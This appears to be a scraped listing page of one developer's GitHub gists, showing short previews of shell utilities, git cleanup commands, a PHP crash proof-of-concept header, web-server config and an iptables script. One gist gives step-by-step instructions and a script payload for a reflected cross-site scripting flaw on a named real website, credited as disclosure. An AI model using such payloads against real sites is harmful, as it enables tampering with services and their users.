View tabstospaces
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
find . -name *.php ! -type d ! -name _tmp_ -exec sh -c 'expand -t 4 {} > _tmp_ && mv _tmp_ {}' \; |
View gist:6099219
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
################################################################ | |
# Pre commit hook for git | |
# | |
# @package: utilities | |
# @subpackage: utilities\git | |
# @author: Aleksey Korzun <al.ko@webfoundation.net> | |
################################################################ |
View gist:6444589
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Proof of concept, segmentation fault (spl_array.c/igbinary.c) | |
* when using nested objects. | |
* | |
* PHP 5.3.6, PECL-Memcached 1.x, Igbinary 1.x | |
* | |
* @author Aleksey Korzun | |
*/ |
View gist:9898360
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Upstream | |
git branch | grep -v "master" | xargs git push origin --delete | |
; Local | |
git branch | grep -v "master" | xargs git branch -D |
View gist:9901938
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Purge old tags | |
tag_limit=8 | |
tag_current=`git tag -n |grep -i "jenkins-${JOB_NAME}" | wc -l` | |
if [ $tag_limit -lt $tag_current ]; then | |
tag_difference=`expr $tag_current - $tag_limit ` | |
git tag |grep -i "jenkins-${JOB_NAME}" | head -$tag_difference | xargs git push --delete origin | |
git tag |grep -i "jenkins-${JOB_NAME}" | head -$tag_difference | xargs git tag -d | |
fi | |
# Create tag |
View gist:9901982
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# Author: Aleksey Korzun | |
email='alert@domain.com' | |
default_max=60 | |
echo "==========================================================================" | |
echo " Replicator Man v1.0.2 " | |
echo "==========================================================================" |
View gist:8e75021a4d045c9420a5
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# Author: Aleksey Korzun | |
echo "==========================================================================" | |
echo " Magento Data Segmentator v1.0.1 " | |
echo "==========================================================================" | |
help() { | |
echo "Usage: -s schema [-f filename] [-e '(baublebar.com|aleksey.v.korzun@gmail.com)'] [-d 7] [-l 1000] [-r 1]" 1>&2; |
View gist:f2bca06f74257cfae288
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Credit to Paul Moore / @Paul_Reviews: | |
1. Navigate to http://www.roboform.com/have-i-been-hacked | |
2. Replace 'Enter account to test' with following: <script type="text/javascript">$('img').attr('src', 'https://lastpass.com/images/lastpass-logo.png');</script> | |
3. Click on 'Check Now' | |
In action: | |
http://g.recordit.co/oBk26XEv0P.gif |
View lighttpd-lua-example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Lighttpd | |
$HTTP["referer"] !~ "^($|http://([^/]*\.)?imagesocket\.(com|net|org)/)" { | |
magnet.attract-physical-path-to = ("/www/sites/conf/imagesocket/bandwidth.lua") | |
} | |
# Lua check for images that exceeded limit(S) | |
# Path - Flag - Expiration | |
local url_check = | |
{ | |
["/images/2012/08/20/1.png"] = true, -- 1352167206 |
View update-pingdom-iptables-centos.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# Whitelist Pingdom probe-servers in iptables. | |
# | |
# Create a chain called "PINGDOM" and jump to it somewhere before | |
# the final REJECT/DROP, e.g. | |
# | |
# # New chain for Pingdom rules | |
# :PINGDOM - [0:0] | |
# |
OlderNewer